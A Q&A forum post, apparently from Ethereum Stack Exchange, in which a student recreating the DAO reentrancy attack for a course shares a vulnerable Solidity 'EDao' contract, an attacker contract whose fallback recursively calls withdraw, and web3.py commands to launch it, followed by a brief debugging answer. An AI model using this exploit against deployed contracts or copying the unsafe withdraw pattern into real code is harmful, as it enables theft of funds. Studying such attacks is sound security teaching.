# DaoAttack not working

Tags: solidity, contract-development, web3.py, attacks, dao

I am trying to replicate the famous DAO attack for a cryptocurrencies course.

I have the following contract already deployed on the blockchain.

```
pragma solidity ^0.5.4;

contract EDao {
    address payable public student; 

    //Events
    event Success(address src,uint256 ret);
    event Fail(address src,uint256 ret);
    event NotEnoughFunds(address src, uint256 req, uint256 avail, uint256 balance);

    //Structs 
    struct Fund {
        address payable payoutAddr;
        uint256 amount;
    }
    struct Investor {
        bool canFund;
        bool canAddInvestor;
    }

    //Mappings  
    mapping(address => Investor) investors;
    mapping(address => Fund) funds;

    constructor(address payable _student) public payable {
        // Set the deployer as one of the investors who initially funded this contract
        investors[msg.sender] = Investor({canFund:true, canAddInvestor:true});

        // Set the student as one of the investors
        student = _student;
        investors[student] = Investor({canFund:true, canAddInvestor:true});
    }

    function fundit(address payable to) public payable {
        Investor memory b = investors[msg.sender];
        if (b.canFund) {
            Fund storage f = funds[to];
            f.payoutAddr = to; 
            f.amount += msg.value;
            emit Success(msg.sender,0);
        } else {
            emit Fail(msg.sender,1);
            revert();
        }
    }

    function queryFunds(address addr) public view returns (uint256) {
        Fund memory f = funds[addr];
        return f.amount;
    }

    function withdraw(address payable addr,uint256 amount) public returns (bool) {
        Fund storage f = funds[addr];
        if (f.amount >= amount && amount <= address(this).balance) {
            (bool success, ) = f.payoutAddr.call.value(amount)("");
            if (success) {
                f.amount = f.amount - amount;
                return true;
            }
        } else {
          emit NotEnoughFunds(msg.sender,amount,f.amount,address(this).balance);
        }
        return false;
    }    

        function getStudent() public view returns (address) {
                return student;
        }

    function addInvestor(address payable investorAddr,bool canAdd) public {
        Investor memory b = investors[msg.sender];
        if (b.canAddInvestor) {
            investors[investorAddr] = Investor({canFund:true, canAddInvestor:canAdd});
            emit Success(msg.sender,0);
        } else {
            emit Fail(msg.sender,2);    
        }
    }

    function getInvestor(address investorAddr) public view returns (bool canFund, bool canAddInvestor) {
        Investor memory b = investors[investorAddr];
        canFund = b.canFund;
        canAddInvestor = b.canAddInvestor;
                return (canFund, canAddInvestor);
    }

}
```

I have also written this contract and also deployed this to the blockchain:

```
pragma solidity ^0.5.12;
import './EDao.sol';

contract Mallory {
    address payable owner;
    EDao public dao = EDao(##EdaoSmartContractAddress##);

    constructor() public{owner = msg.sender; }

    function getJackpot()public { owner.transfer(address(this).balance); }

    function() external payable { dao.withdraw(address(this), 1000000000000000000); }

}
```

Now, to run the attack, I am doing the following:

Sending 1 eth to the edao address (contract) for the mallory address (einstance):

```
contract_function = contract.functions.fundit(einstance.address)
tx_hash = contract_function.transact({"from": w3.eth.accounts[0], "value": 1000000000000000000})
```

And then sending a transaction to Mallory with gas:

```
w3.eth.sendTransaction({'from':w3.eth.accounts[0], 
                        'to':einstance.address, 
                        'value':1,
                        'gas': 4712388})
```

After this ideally the callback function should help Mallory to steal all the coins from EDao. However, edao' balance increases by 1 and Mallory stays at zero.

Please help me to fix this. Am I doing something wrong?

Answer (score 0):

I tried the contracts on remix.ethereum.org and they work as expected

Since your call is recursive at some point it will run out of gas and it will log `NotEnoughFunds` and the recursion will stop.

Some suggestions:

- Make the initial funding with more than 1 ether.
- Generate an event for a successful withdraw